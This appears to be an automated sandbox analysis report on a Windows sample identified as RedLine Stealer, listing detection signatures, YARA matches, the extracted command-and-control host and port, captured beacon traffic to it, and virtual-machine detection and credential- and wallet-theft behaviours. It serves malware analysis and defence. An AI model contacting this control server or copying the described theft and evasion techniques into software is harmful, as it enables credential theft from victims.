Edit tour

Windows Analysis Report
4JL966sxM4.exe

Overview

General Information

Sample Name:	4JL966sxM4.exe
Original Sample Name:	b83c75e00f5f8d62de662451b631278b.exe
Analysis ID:	1311061
MD5:	b83c75e00f5f8d62de662451b631278b
SHA1:	8474a9f56f6d86b60a62df362dfa9cf80905b43a
SHA256:	64cb8d6034bd7bf642bcd0f0fc1606fa345fd0273546ae10f177c191320921e9
Tags:	exeRedLineStealer
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Tries to steal Crypto Currency Wallets

Connects to many ports of the same IP (likely port scanning)

Uses known network protocols on non-standard ports

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

C2 URLs / IPs found in malware configuration

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Internet Provider seen in connection with other malware

Detected potential crypto function

Yara detected Credential Stealer

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

Detected TCP or UDP traffic on non-standard ports

Binary contains a suspicious time stamp

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

Process Tree

System is w10x64

4JL966sxM4.exe (PID: 7004 cmdline: C:\Users\user\Desktop\4JL966sxM4.exe MD5: B83C75E00F5F8D62DE662451B631278B)

conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/ https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["jul-nelson.gl.at.ply.gg:47198"], "Bot Id": "cheat"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
4JL966sxM4.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4JL966sxM4.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4JL966sxM4.exe	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
4JL966sxM4.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165fe:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165df:$v2_6: GetUpdates

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.267805940.0000000000C12000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.267805940.0000000000C12000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000000.267805940.0000000000C12000.00000002.00000001.01000000.00000003.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
Process Memory Space: 4JL966sxM4.exe PID: 7004	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 4JL966sxM4.exe PID: 7004	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: 4JL966sxM4.exe PID: 7004	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x62117b:$a4: get_ScannedWallets 0x620022:$a5: get_ScanTelegram 0x620e04:$a6: get_ScanGeckoBrowsersPaths 0x61ecb5:$a7: <Processes>k__BackingField 0x61c1e8:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x61e5e9:$a9: <ScanFTP>k__BackingField
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.4JL966sxM4.exe.c10000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.4JL966sxM4.exe.c10000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.0.4JL966sxM4.exe.c10000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
0.0.4JL966sxM4.exe.c10000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165fe:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165df:$v2_6: GetUpdates

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: jul-nelson.gl.at.ply.gg:47198Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: jul-nelson.gl.at.ply.gg

Source: 4JL966sxM4.exe, 00000000.00000002.336871332.000000000110B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

memstr_e059636d-0

System Summary

Malicious sample detected (through community Yara rule)

Source: 4JL966sxM4.exe, type: SAMPLE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 4JL966sxM4.exe, type: SAMPLE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.0.4JL966sxM4.exe.c10000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.0.4JL966sxM4.exe.c10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000000.267805940.0000000000C12000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: 4JL966sxM4.exe PID: 7004, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

Source: 4JL966sxM4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 4JL966sxM4.exe, type: SAMPLE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 4JL966sxM4.exe, type: SAMPLE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.0.4JL966sxM4.exe.c10000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.0.4JL966sxM4.exe.c10000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000000.267805940.0000000000C12000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: 4JL966sxM4.exe PID: 7004, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\4JL966sxM4.exe	Code function: 0_2_05575480	0_2_05575480
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Code function: 0_2_05574D20	0_2_05574D20
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Code function: 0_2_05576F00	0_2_05576F00
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Code function: 0_2_055782B8	0_2_055782B8
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Code function: 0_2_055782A9	0_2_055782A9

Source: 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002F81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs 4JL966sxM4.exe
Source: 4JL966sxM4.exe, 00000000.00000002.336871332.000000000110B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 4JL966sxM4.exe
Source: 4JL966sxM4.exe, 00000000.00000000.267805940.0000000000C12000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs 4JL966sxM4.exe
Source: 4JL966sxM4.exe	Binary or memory string: OriginalFilenameImplosions.exe4 vs 4JL966sxM4.exe

Source: 4JL966sxM4.exe

ReversingLabs: Detection: 84%

Source: 4JL966sxM4.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\4JL966sxM4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\4JL966sxM4.exe C:\Users\user\Desktop\4JL966sxM4.exe
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Source: C:\Users\user\Desktop\4JL966sxM4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\4JL966sxM4.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\4JL966sxM4.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\4JL966sxM4.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\4JL966sxM4.exe

File created: C:\Users\user\AppData\Local\Yandex

Jump to behavior

Source: C:\Users\user\Desktop\4JL966sxM4.exe

File created: C:\Users\user\AppData\Local\Temp\tmpE4.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/27@5/1

Source: 4JL966sxM4.exe, 00000000.00000002.337006053.0000000003143000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337006053.00000000030DD000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337006053.0000000003077000.00000004.00000800.00020000.00000000.sdmp, tmpC42C.tmp.0.dr, tmpC41B.tmp.0.dr, tmpC41A.tmp.0.dr, tmpC42B.tmp.0.dr, tmp8DB6.tmp.0.dr, tmpC3F9.tmp.0.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 4JL966sxM4.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_01

Source: C:\Users\user\Desktop\4JL966sxM4.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 4JL966sxM4.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 4JL966sxM4.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: 4JL966sxM4.exe

Static PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 47198
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 47198
Source: unknown	Network traffic detected: HTTP traffic on port 47198 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 47198 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 47198
Source: unknown	Network traffic detected: HTTP traffic on port 47198 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 47198
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 47198
Source: unknown	Network traffic detected: HTTP traffic on port 47198 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 47198 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 47198
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 47198
Source: unknown	Network traffic detected: HTTP traffic on port 47198 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 47198 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 47198 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 47198 -> 49714

Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\4JL966sxM4.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\4JL966sxM4.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Source: C:\Users\user\Desktop\4JL966sxM4.exe TID: 6616

Thread sleep time: -29514790517935264s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\4JL966sxM4.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\4JL966sxM4.exe

Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\4JL966sxM4.exe	Window / User API: threadDelayed 1962			Jump to behavior
Source: C:\Users\user\Desktop\4JL966sxM4.exe	Window / User API: threadDelayed 7590			Jump to behavior

Source: C:\Users\user\Desktop\4JL966sxM4.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\4JL966sxM4.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\4JL966sxM4.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: 4JL966sxM4.exe, 00000000.00000002.340526177.0000000008C82000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware
Source: 4JL966sxM4.exe, 00000000.00000002.340526177.0000000008C82000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareRDU6NMNCWin32_VideoControllerM95NW773VideoController120060621000000.000000-00058.8.243display.infMSBDAX6X5535XPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsOK31Z5_CLMEMp
Source: 4JL966sxM4.exe, 00000000.00000002.336871332.00000000011B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\4JL966sxM4.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\4JL966sxM4.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\4JL966sxM4.exe	Queries volume information: C:\Users\user\Desktop\4JL966sxM4.exe VolumeInformation	Jump to behavior
